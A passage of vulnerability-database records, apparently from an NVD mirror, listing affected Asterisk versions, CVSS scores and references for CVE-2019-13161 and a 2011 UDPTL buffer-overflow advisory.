              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "56849E34-B192-46A8-A517-C7C184A901B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4610D544-156F-4E9A-BC46-9E0FF8D5D641",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "0C6CF412-290C-4524-9AFE-D58A85183864",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8A9D3C5C-627E-43A3-89C2-95F7B8803361",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5060CAED-EEAB-4AD1-B964-F6538499BF73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "BA3211EE-E305-4247-AA2E-910E48CBCDF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "61816D1A-D952-4E4F-B5DD-3B7A94BD8596",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert3-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6B4693A3-86BC-4368-AFDA-B0E323776957",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "4D1D0689-E276-47DD-B51A-C221F12C60A2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "8433CB3B-56BA-4674-AC2B-813A7F3EDEC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "9E1066C8-8A7E-487B-8D9B-DD4A55A5C5EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "3C1A0AE4-EA01-445E-89AE-1A9734478994",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "4497BD45-DFC5-4729-98CD-20C94BC20C70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9F68ED1E-8D2B-4AEE-B5DE-FD50338BA82D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "EA9F296A-4932-4EA4-8B38-80856A9D6374",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B40673A6-2980-440A-B78E-D5C7095E3FA6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "38E19C8E-9FD6-4A44-81C6-EEC91BC2CB58",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "3C7605A6-380F-44E8-81A1-5BDAEBFFB0A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "43DB632E-C528-40E3-8EB0-AA6A7476657C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2016E8F9-542D-46CE-905D-3CBAF97A24A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CC283754-B316-4BCE-8EEB-63CAFE68D601",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D111448-7C39-4A6D-B492-B3D3DCEA8424",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6267CC33-3961-4D9A-899B-4F34BAD64067",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert2-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0CCF7282-A16F-499E-B607-929F346A85A8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert2_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A52E12AB-99CA-4A34-A0CA-E8B511636A5E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "ACFD2F39-957E-42CE-8016-21314F432335",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "22E13F7F-1D64-4248-84F2-C6E89A2FC977",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB08CB2-8FB4-4738-9B67-C27273A78025",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1E36EFEF-670E-4659-A887-D497D4AA8223",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BED18370-B09E-44D8-8E84-1B0DCDF81864",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "2F2F88BE-10E5-4C21-B67B-1AC264921663",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "0742A842-254A-4008-9D77-D0A810110841",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "06396597-A5D1-4C30-B07F-E989E322733E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6447B77F-3770-4703-9188-B7344ED98E94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "5C103924-1D61-4090-8ED5-4731371B2B2C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "08F87B09-3867-4CAE-BAD7-2206CD6CAF97",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "0D12B31E-C30C-442A-9BD8-504CF7EB1321",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "B43DA484-83DC-4489-9037-B85B845078E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "D8740005-0BCF-4B76-A600-25A9BF0F3C42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "4298EEE5-3F0E-4227-ACF8-CEE18868055F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "AC42C2B5-4F5F-4D5E-9240-9F104BBB5D55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.13-cert2:*:*:*:*:*:*:*",
              "matchCriteriaId": "FDC2D03A-A47C-4211-8FAA-D357E9B98EFD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "05795EED-0473-4806-A9AD-FD92212CCC77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "538C22F0-4DC4-463E-950C-3594E2935B78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "3C3D4786-5B7C-4F8B-9EBE-1C13599EC906",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "03C662D2-48CF-41DD-BE6B-C2A961C32D13",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "C3F701AA-E842-4680-9747-000C3A4F6E4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "4B0FC294-F910-491B-9DEF-9FFEACA208C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.18:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "B69E9C34-4F57-4948-9D53-0856E00F7949",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "B7EE2BD3-51DC-4DA5-A5F2-6275F5277BE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DC85AF18-A304-4BD8-AFAA-F99AC37A799B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "03094F8E-FF0C-4831-A50F-B601949FD3BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6A7B650A-4785-4A8B-BCB6-1B630A0E18E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "6B791DBB-EB45-4E9C-9C57-249D196EC0E5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2404213-CAA0-4E84-9D73-7DC8D7DCB558",
              "versionEndExcluding": "13.27.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C7B32887-22B1-4B06-A18D-0C8B690CA699",
              "versionEndExcluding": "15.7.3",
              "versionStartIncluding": "15.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "6B58771D-C37A-487D-8B82-C63F7F45E217",
              "versionEndExcluding": "16.4.1",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Asterisk Open Source through 13.27.0, 14.x and 15.x through 15.7.2, and 16.x through 16.4.0, and Certified Asterisk through 13.21-cert3. A pointer dereference in chan_sip while handling SDP negotiation allows an attacker to crash Asterisk when handling an SDP answer to an outgoing T.38 re-invite. To exploit this vulnerability an attacker must cause the chan_sip module to send a T.38 re-invite request to them. Upon receipt, the attacker must send an SDP answer containing both a T.38 UDPTL stream and another media stream containing only a codec (which is not permitted according to the chan_sip configuration)."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en Asterisk Open Source hasta versiones 13.27.0, 14.x y 15.x hasta 15.7.2, y versiones 16.x hasta 16.4.0, y Certified Asterisk hasta versi\u00f3n 13.21-cert3. Una desreferencia de puntero en chan_sip durante el manejo de la negociaci\u00f3n SDP permite a un atacante bloquear Asterisk cuando maneja una respuesta SDP en una re-invitaci\u00f3n T.38 saliente. Para explotar esta vulnerabilidad un atacante debe hacer que el m\u00f3dulo chan_sip les env\u00ede una petici\u00f3n de re-invitaci\u00f3n T.38. Una vez recibida, el atacante debe enviar una respuesta SDP que contenga tanto un flujo UDPTL T.38 como otro flujo multimedia que contenga solo un c\u00f3dec (lo que no est\u00e1 permitido de acuerdo a la configuraci\u00f3n de chan_sip)."
    }
  ],
  "id": "CVE-2019-13161",
  "lastModified": "2024-11-21T04:24:19.633",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 3.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.6,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-07-12T20:15:11.127",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2019-003.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28465"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2019-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28465"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-476"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-03-15 17:55

Modified

2024-11-21 01:25

Severity ?

Summary

Multiple stack-based and heap-based buffer overflows in the (1) decode_open_type and (2) udptl_rx_packet functions in main/udptl.c in Asterisk Open Source 1.4.x before 1.4.39.2, 1.6.1.x before 1.6.1.22, 1.6.2.x before 1.6.2.16.2, and 1.8 before 1.8.2.4; Business Edition C.x.x before C.3.6.3; AsteriskNOW 1.5; and s800i (Asterisk Appliance), when T.38 support is enabled, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted UDPTL packet.

References

URL	Tags
secalert@redhat.com	http://downloads.asterisk.org/pub/security/AST-2011-002.html	Vendor Advisory
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055030.html	Patch
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055421.html	Patch
secalert@redhat.com	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055634.html	Patch
secalert@redhat.com	http://secunia.com/advisories/43429	Vendor Advisory
secalert@redhat.com	http://secunia.com/advisories/43702	Vendor Advisory
secalert@redhat.com	http://www.debian.org/security/2011/dsa-2225
secalert@redhat.com	http://www.openwall.com/lists/oss-security/2011/03/11/2
secalert@redhat.com	http://www.openwall.com/lists/oss-security/2011/03/11/8
secalert@redhat.com	http://www.securityfocus.com/bid/46474
secalert@redhat.com	http://www.securitytracker.com/id?1025101
secalert@redhat.com	http://www.vupen.com/english/advisories/2011/0635	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-002.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055030.html	Patch
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055421.html	Patch
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055634.html	Patch
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/43429	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/43702	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2225
af854a3a-2127-422b-91ae-364da2661108	http://www.openwall.com/lists/oss-security/2011/03/11/2
af854a3a-2127-422b-91ae-364da2661108	http://www.openwall.com/lists/oss-security/2011/03/11/8
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/46474
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1025101
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2011/0635	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.1
digium	asterisk	1.4.2
digium	asterisk	1.4.3
digium	asterisk	1.4.10
digium	asterisk	1.4.10.1
digium	asterisk	1.4.11
digium	asterisk	1.4.12
digium	asterisk	1.4.12.1
digium	asterisk	1.4.13
digium	asterisk	1.4.14
digium	asterisk	1.4.15
digium	asterisk	1.4.16
digium	asterisk	1.4.16.1
digium	asterisk	1.4.16.2
digium	asterisk	1.4.17
digium	asterisk	1.4.18
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19.1
digium	asterisk	1.4.19.2
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20.1
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21.1
digium	asterisk	1.4.21.2
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22.1
digium	asterisk	1.4.22.2
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23.1
digium	asterisk	1.4.23.2
digium	asterisk	1.4.24
digium	asterisk	1.4.24
digium	asterisk	1.4.24.1
digium	asterisk	1.4.25
digium	asterisk	1.4.25
digium	asterisk	1.4.25.1
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26.1
digium	asterisk	1.4.26.2
digium	asterisk	1.4.26.3
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27.1
digium	asterisk	1.4.28
digium	asterisk	1.4.28
digium	asterisk	1.4.29
digium	asterisk	1.4.29
digium	asterisk	1.4.29.1
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.32
digium	asterisk	1.4.32
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33.1
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.35
digium	asterisk	1.4.35
digium	asterisk	1.4.36
digium	asterisk	1.4.36
digium	asterisk	1.4.37
digium	asterisk	1.4.37
digium	asterisk	1.4.38
digium	asterisk	1.4.38
digium	asterisk	1.4.39
digium	asterisk	1.4.39
digium	asterisk	1.4.39.1
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	c.1.0
digium	asterisk	c.1.0
digium	asterisk	c.1.6
digium	asterisk	c.1.6.1
digium	asterisk	c.1.6.2
digium	asterisk	c.1.8.0
digium	asterisk	c.1.8.1
digium	asterisk	c.2.3
digium	asterisk	c.3.0
digium	asterisk	c.3.1.0
digium	asterisk	c.3.1.1
digium	asterisk	c.3.2.2
digium	asterisk	c.3.2.3
digium	asterisk	c.3.3.2
digium	asterisk	c.3.6.2
digium	asterisknow	1.5
digium	s800i	*
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.1
digium	asterisk	1.6.1.2
digium	asterisk	1.6.1.3
digium	asterisk	1.6.1.4
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.6
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.8
digium	asterisk	1.6.1.9
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.11
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.14
digium	asterisk	1.6.1.15
digium	asterisk	1.6.1.16
digium	asterisk	1.6.1.17
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.21

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1188DA-6C27-48D2-9CE7-74D77B24EE9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A93B8F91-5C56-44DE-AE29-8468E853759F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "BF7F4D02-7C8E-403C-A53E-A5F8C07F33A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "D85031A3-3444-4650-905D-721F1EBAA24F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F0AC2B3-6E8A-4B26-8A6C-792D9E5072C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC8D6D4-A389-4A78-8DA8-351A9CB896E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E979AC4-58EA-4297-9F90-350924BBE440",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9154EDB-CAE6-4BB0-8D02-9EC2B81D93C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A432B0A7-F158-4B9C-97F6-6A29DB13EAFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "687C67CB-46AF-40C2-8A02-081C7F78568A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E8D6EC0-A61E-4DBC-A0C7-864E9C4BDA1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EF7F65A-45FD-4586-901E-49B057100BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "300F158E-ED27-46C8-85E4-AA0AA6B201DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB6F04C0-3226-4D2C-97A3-39999483C62C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "30685A20-963A-48D4-B7D7-2C11C2C812AA",
